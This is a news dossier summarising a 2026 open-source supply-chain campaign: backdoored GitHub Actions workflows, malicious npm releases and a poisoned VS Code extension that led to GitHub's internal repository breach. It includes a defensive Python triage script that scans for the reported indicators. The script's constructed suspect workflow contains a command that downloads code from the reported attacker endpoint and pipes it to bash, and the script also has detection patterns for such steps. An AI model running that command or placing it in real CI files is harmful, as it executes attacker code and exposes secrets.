A rapid, automated supply-chain campaign, reported variously as Megalodon, Mini Shai-Hulud and TeamPCP activity, has poisoned thousands of open-source projects across GitHub and npm. Attackers used trojanized VS Code extensions, compromised maintainer accounts and forged CI commits to publish backdoored packages, inject malicious GitHub Actions workflows, and exfiltrate credentials from developer endpoints and CI. The wave includes hundreds of malicious npm releases, thousands of backdoored repos, and a GitHub internal breach of ~3,800 repositories. The crisis exposes weaknesses in the verification model (Sigstore provenance, CI), insecure developer tooling, and lax credential hygiene, driving calls for MFA, dependency pinning, stricter CI governance, staged publishing and broader supply-chain scanning.
The campaign demonstrates how developer tooling and CI can be weaponized to corrupt vast open-source supply chains, raising systemic risk for software projects and cloud deployments. Tech professionals must reassess dependency trust, CI controls, and credential hygiene to limit propagation and impact.
Dossier last updated: 2026-05-23 12:39:58
Security researchers uncovered the “Megalodon” campaign that backdoored more than 5,000 GitHub repositories by abusing GitHub Actions workflows. Attackers used throwaway or compromised accounts and weak branch protections to inject malicious CI steps that download and run infostealer malware from external URLs, turning supply-chain automation into a mass distribution vector. OX Security and SafeDep led analysis, highlighting how automated CI/CD environments, token permissions, and insufficient repository safeguards allowed rapid propagation. The incident matters because it shows how modern development workflows and ephemeral contributor accounts can be weaponized to exfiltrate secrets and compromise developer and enterprise infrastructure, prompting urgent need for stricter branch policies, least-privilege tokens, and CI workflow auditing.
Security researchers disclosed a supply-chain campaign called “Megalodon” that has compromised over 5,500 GitHub repositories by injecting malicious code into open-source projects and package manifests. The campaign leverages compromised accounts, credential stuffing, and repo takeover to introduce backdoors and typosquatted dependencies, enabling downstream supply-chain contamination across npm, PyPI and other ecosystems. Major risks include silent propagation to downstream projects, automated CI/CD workflows pulling poisoned packages, and credential exposure via leaked tokens. This matters because it undermines open-source trust, threatens millions of users and deployments relying on affected libraries, and highlights gaps in repository access controls, dependency verification, and package registry protections. Mitigations include rotating credentials, enforcing 2FA, dependency pinning and supply-chain scanning.
Security researchers disclosed a large-scale supply-chain attack on GitHub, dubbed "Megalodon," that compromised over 5,500 repositories by injecting malicious code into open-source packages and projects. The campaign exploited compromised accounts and package publishing workflows to push backdoored updates that could exfiltrate credentials or run arbitrary commands. Affected projects span multiple languages and ecosystems, increasing risk for downstream users and dependent software. GitHub and maintainers are urged to rotate credentials, audit recent commits and package releases, and enforce multi-factor authentication and signed commits/packages. The incident highlights persistent threats to the software supply chain and the need for stronger repository hygiene, dependency monitoring, and platform-level protections.
On May 18–19 attackers used stolen maintainer credentials to publish hundreds of malicious npm package versions that passed Sigstore provenance checks because the adversary could obtain valid signing certificates. The Mini Shai-Hulud campaign (attributed to TeamPCP) and a separate compromise of the Nx Console VS Code extension led to thousands of installs and harvesting of cloud credentials, tokens, and 1Password vaults. Researchers from Endor Labs, Socket, StepSecurity, Adversa AI, Johns Hopkins, Microsoft MSRC and others say the developer-tool verification model is broken: CI, Sigstore, IDE/extension credential storage, agent frameworks, and AI coding CLIs all expose attack surfaces. Notably, TrustFall showed AI coding CLIs auto-execute project MCP servers with full privileges, enabling secret exfiltration and supply-chain propagation.
A cybercriminal group called TeamPCP has escalated software supply-chain attacks into a persistent campaign, recently breaching GitHub after a developer installed a malicious VSCode extension and claiming access to roughly 3,800–4,000 internal repositories. Security firms say TeamPCP has executed about 20 waves of attacks in months, tainting 500+ distinct open-source projects and using infected developer tools to steal credentials, publish malicious packages, and later extort victims. The group reportedly automates propagation with a self-spreading worm dubbed Mini Shai-Hulud that creates repositories with stolen encrypted credentials, accelerating a self-perpetuating “flywheel” of compromises across developer ecosystems. The spree heightens systemic risk for software supply chains and developer trust.
GitHub confirmed a major software supply-chain breach after attackers from the criminal group TeamPCP used a poisoned VSCode extension to access roughly 3,800–4,000 internal repositories and posted stolen source code for sale. Security firms say TeamPCP has run an unprecedented, sustained campaign—about 20 waves in recent months—tainting more than 500 distinct open-source packages and using planted malware to steal credentials, publish backdoored releases, and breach downstream companies including OpenAI and Mercor. Analysts warn TeamPCP automated much of the campaign with a self-spreading worm (Mini Shai-Hulud), creating a repeatable “flywheel” that amplifies supply-chain compromise risk across developer toolchains and critical software infrastructure.
Megalodon: Mass GitHub Repo Backdooring via CI Workflows
New guidance urges JavaScript developers to switch from npm to pnpm to reduce supply-chain risk and improve performance. The recommendation, highlighted in a blog post and shared on Reddit, argues pnpm’s strict node_modules layout, deterministic lockfile handling and stricter dependency resolution lower exploit surface and accidental package hoarding. It notes pnpm’s faster installs and disk-space savings as operational benefits, and warns that npm’s looser hoisting and flat dependency model can enable malicious packages and make attacks harder to contain. The piece matters because package manager choice affects millions of Node.js projects and can materially improve security posture and developer productivity with relatively low migration effort.
Mitchell Hashimoto, a longtime GitHub user, publicly announced he's leaving after repeated GitHub outages and reliability issues, amplifying wider developer discontent as major customers and OpenAI explore alternatives. Recent crises include a May 21st breach where a poisoned VS Code extension exposed credentials and led to 3,800+ internal repositories being compromised and offered for sale, plus a disclosed 0-day in Git infrastructure. Internal upheaval followed Microsoft reorganizing GitHub under CoreAI, removing the CEO role and triggering executive departures. Competition from Cursor and Claude Code, rising Copilot costs and unsustainable AI inference expenses, and migration projects to Azure that caused downtime have worsened trust. The story matters because GitHub's stability, security and business model affect the global developer ecosystem and Microsoft’s cloud margins.
A widely used JavaScript template package, art-template, was confirmed as the latest victim of a supply-chain attack on the npm ecosystem, where attackers have controlled the repository since 2025 and injected unauthorized remote JavaScript (including calls to Baidu Analytics). Developers and sysadmins raced to assess exposure across projects that pull dependencies via npm, which the article argues is the dominant vector for such incidents. Users quoted describe a sense of helplessness and point to weak maintainer account security as a root cause; the breach underscores ongoing risks in package-manager distributed dependencies and the need for stronger supply-chain practices. Upstream art-template documentation has been published with details.
On May 18, 2026, a campaign dubbed Megalodon pushed 5,718 malicious commits to 5,561 GitHub repositories in six hours, injecting GitHub Actions workflows that exfiltrate CI secrets, cloud credentials, SSH keys, OIDC tokens and source code artifacts to a C2 at 216.126.225.129:8443. The attacker used throwaway accounts and forged identities (build-bot, auto-ci, ci-bot, pipeline-bot) and deployed two variants: a mass SysDiag workflow that triggers on push and pull_request_target, and a targeted Optimize-Build variant that replaces workflows and exposes a workflow_dispatch backdoor. The campaign also propagated via the npm package @tiledesk/tiledesk-server (v2.18.6–2.18.12). This matters because CI workflow compromise allows large-scale credential theft and cloud identity impersonation, threatening downstream supply chains and cloud environments.
GitHub is facing a crisis inside Microsoft after a wave of outages, a remote code execution vulnerability, and a supply-chain compromise that exposed internal repos, coinciding with leadership upheaval and a continuing talent exodus. After CEO Thomas Dohmke’s departure last summer, Microsoft folded GitHub under its CoreAI group led by Jay Parikh, who opted not to install a new GitHub CEO; that shift and poor internal morale reportedly accelerated departures and defections to startups like Entire. Competitive pressure is rising too: rivals such as Cursor and Anthropic’s Claude Code have narrowed GitHub Copilot’s lead, prompting Microsoft to reconsider acquisitions and reallocate developer resources to improve Copilot. The situation matters because GitHub’s stability, security, and ability to retain engineering talent are critical to the broader developer ecosystem and Microsoft’s AI tooling strategy.
Security researchers uncovered an automated campaign that injected malicious CI workflow commits into thousands of GitHub repositories: over 5,700 poisoned commits across 5,561 repos in about six hours. Attackers used throwaway accounts and forged commit authors (e.g., build-bot, auto-ci, ci-bot, pipeline-bot) with innocuous messages like "ci: add build optimization step" to insert backdoored GitHub Actions steps. The change could enable supply-chain compromise by running attacker-controlled code in downstream builds or leaking secrets. The campaign highlights risks in trusting external pull requests and the need for stricter CI governance, code-review policies, and repository protection to prevent automated backdoor propagation through developer tooling.
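The two summaries above give enough concrete indicators (the forged author names, the commit message, the SysDiag and Optimize-Build workflow names, the C2 endpoint, and the pull_request_target / workflow_dispatch triggers) to build a first-pass triage check for a repository's own history. The script below is an added example written for this dossier; it is not code from any of the cited reports or from the affected projects. It does crude text matching rather than full YAML parsing, and the regexes for download-and-execute steps and for dumping the whole `secrets` context are my own generic heuristics, not indicators taken from the reporting. The sample workflows and commit metadata are constructed for the demonstration.

```python
"""Heuristic triage of GitHub Actions workflows and commit metadata for the
indicators reported for the Megalodon campaign. Added example, not from any of
the summarised reports. The indicator sets below are limited to values the
reporting names; the regexes are generic, assumed-reasonable heuristics."""
import re

# Indicators as reported (forged commit identities, workflow names, message, C2).
FORGED_AUTHORS = {"build-bot", "auto-ci", "ci-bot", "pipeline-bot"}
WORKFLOW_NAMES = {"SysDiag", "Optimize-Build"}
COMMIT_MESSAGE = "ci: add build optimization step"
C2_ENDPOINT = "216.126.225.129:8443"
# Triggers that run with write tokens / secrets and are routinely abused.
RISKY_TRIGGERS = ("pull_request_target", "workflow_dispatch")

# Generic heuristics (assumptions, not from the reports):
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^\n]*\|\s*(ba)?sh\b")      # fetch | sh
BARE_IP_URL = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?")  # raw IP URL
SECRETS_DUMP = re.compile(r"toJSON\(\s*secrets\s*\)")                    # whole-context dump


def on_block(text):
    """Return the lines of the top-level `on:` mapping (crude YAML slicing)."""
    out, inside = [], False
    for line in text.splitlines():
        if re.match(r"^on:", line):
            inside = True
        elif inside and line.strip() and not line[0].isspace():
            break  # next top-level key ends the block
        if inside:
            out.append(line)
    return "\n".join(out)


def scan_workflow(text):
    """Return reasons a workflow file looks suspicious (empty list = nothing found)."""
    reasons = []
    m = re.search(r"^name:\s*(.+)$", text, re.M)
    if m and m.group(1).strip().strip("'\"") in WORKFLOW_NAMES:
        reasons.append(f"workflow name '{m.group(1).strip()}' matches reported campaign")
    triggers = on_block(text)
    for trig in RISKY_TRIGGERS:
        if re.search(rf"\b{trig}\b", triggers):
            reasons.append(f"privileged trigger {trig}")
    if C2_ENDPOINT in text:
        reasons.append("contains reported C2 endpoint")
    for line in text.splitlines():
        if PIPE_TO_SHELL.search(line):
            reasons.append(f"download-and-execute step: {line.strip()}")
        elif BARE_IP_URL.search(line):
            reasons.append(f"fetch from bare IP: {line.strip()}")
        if SECRETS_DUMP.search(line):
            reasons.append("dumps entire secrets context")
    return reasons


def scan_commit(author, message, touched_paths):
    """Flag commit metadata that matches the reported forged-CI pattern."""
    reasons = []
    if author.lower() in FORGED_AUTHORS:
        reasons.append(f"author '{author}' is a reported forged identity")
    if message.strip().lower() == COMMIT_MESSAGE:
        reasons.append("commit message matches reported campaign")
    if any(p.startswith(".github/workflows/") for p in touched_paths):
        reasons.append("modifies CI workflow")
    return reasons


# Constructed samples: one ordinary CI file, one shaped like the reported variant.
BENIGN = """name: CI
on:
  push:
    branches: [main]
  pull_request:
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm ci && npm test
"""

SUSPECT = """name: SysDiag
on:
  push:
  pull_request_target:
jobs:
  diag:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: collect
        run: curl -s http://216.126.225.129:8443/x | bash
"""

if __name__ == "__main__":
    for label, wf in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(label, scan_workflow(wf))
    print(scan_commit("build-bot", COMMIT_MESSAGE, [".github/workflows/sysdiag.yml"]))
```

Run it over every file under `.github/workflows/` and over `git log --format='%an%x09%s' --name-only` output for the window in question; anything that trips more than one reason deserves a manual look, and the commit check is useful on its own because the reported commits carried innocuous messages and forged authors regardless of what the workflow body contained.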
Runtime, a YC-backed startup (P26) founded by Gus and Carlos, launched an infra product that provisions sandboxed coding-agent environments so entire teams — including non-engineers — can use models like Claude Code, Codex, Copilot, Gemini and Devin safely. Engineering defines context, skills, and scoped integrations once; Runtime snapshots full running environments (Docker Compose, Kafka, Redis, seeded DBs) and orchestrates sandboxes across providers (E2B, Daytona, EC2, or self-hosted K8s). Secrets are proxied, and infra-level guardrails (command allow/deny, egress controls, RBAC) limit risk. Integrations include Slack, GitHub, PagerDuty, and Linear. Core is open source on GitHub, with a hosted SaaS offering and customers already in fintech and YC scaleups. This matters because it lowers the barrier to deploying agentic workflows while reducing security and operational friction.
Sergiu Gatlan / BleepingComputer: GitHub links the breach of 3,800 internal repositories to the TanStack npm supply-chain attack, saying hackers used a malicious Nx Console VS Code extension. GitHub says the hackers who breached 3,800 internal repositories gained access via a malicious version of the Nx Console VS Code extension …
GitHub disclosed that a developer’s VSCode extension was ‘poisoned’ in a supply-chain attack by a prolific hacker group called TeamPCP, which claims to have accessed roughly 4,000 GitHub repositories and advertised the company’s source code for sale. Security firms say TeamPCP has run at least 20 attack “waves” in recent months, tainting over 500 distinct open-source projects and compromising hundreds of downstream organizations, including AI company Anthropic and data firm Mercor. The group’s playbook inserts malware into widely used developer tools to harvest credentials, push malicious package versions, and then scale further—creating a self-reinforcing cycle of supply-chain compromise. The spree underscores growing systemic risk to software development ecosystems and the need for stronger supply-chain defenses.
GitHub confirmed that about 3,800 internal repositories were breached after an employee installed a trojanized VS Code extension; the malicious extension was removed and the compromised endpoint isolated during ongoing incident response. GitHub says the activity appears limited to internal repositories and there’s no current evidence of exposed customer data outside those repos. The cybercrime group TeamPCP claimed responsibility and is offering the purportedly stolen code for sale, and has been linked to prior supply-chain attacks targeting developer platforms. The incident highlights persistent risks from malicious editor extensions and supply-chain vectors that can expose sensitive corporate source code and developer credentials.
Staged publishing for npm packages
GitHub confirmed a breach via a malicious VS Code extension that compromised an employee device and exfiltrated internal repositories — roughly consistent with the attacker’s claim of ~3,800 repos. The incident highlights a wider, ongoing supply-chain campaign by groups like TeamPCP/UNC6780 that has targeted developer tooling (Trivy, Checkmarx, LiteLLM, Bitwarden CLI, PyTorch Lightning) and npm accounts, pushing malicious packages that harvest tokens, keys, and secrets. The article warns that developer endpoints — laptops running trusted third-party binaries, extensions, and local AI agents — are high‑privilege, under-monitored perimeters; compromising their supply chain bypasses platform controls and can pivot into cloud and production environments. The piece calls for reassessing trust models around local developer tooling and tighter controls on agent/extension distribution and credentials.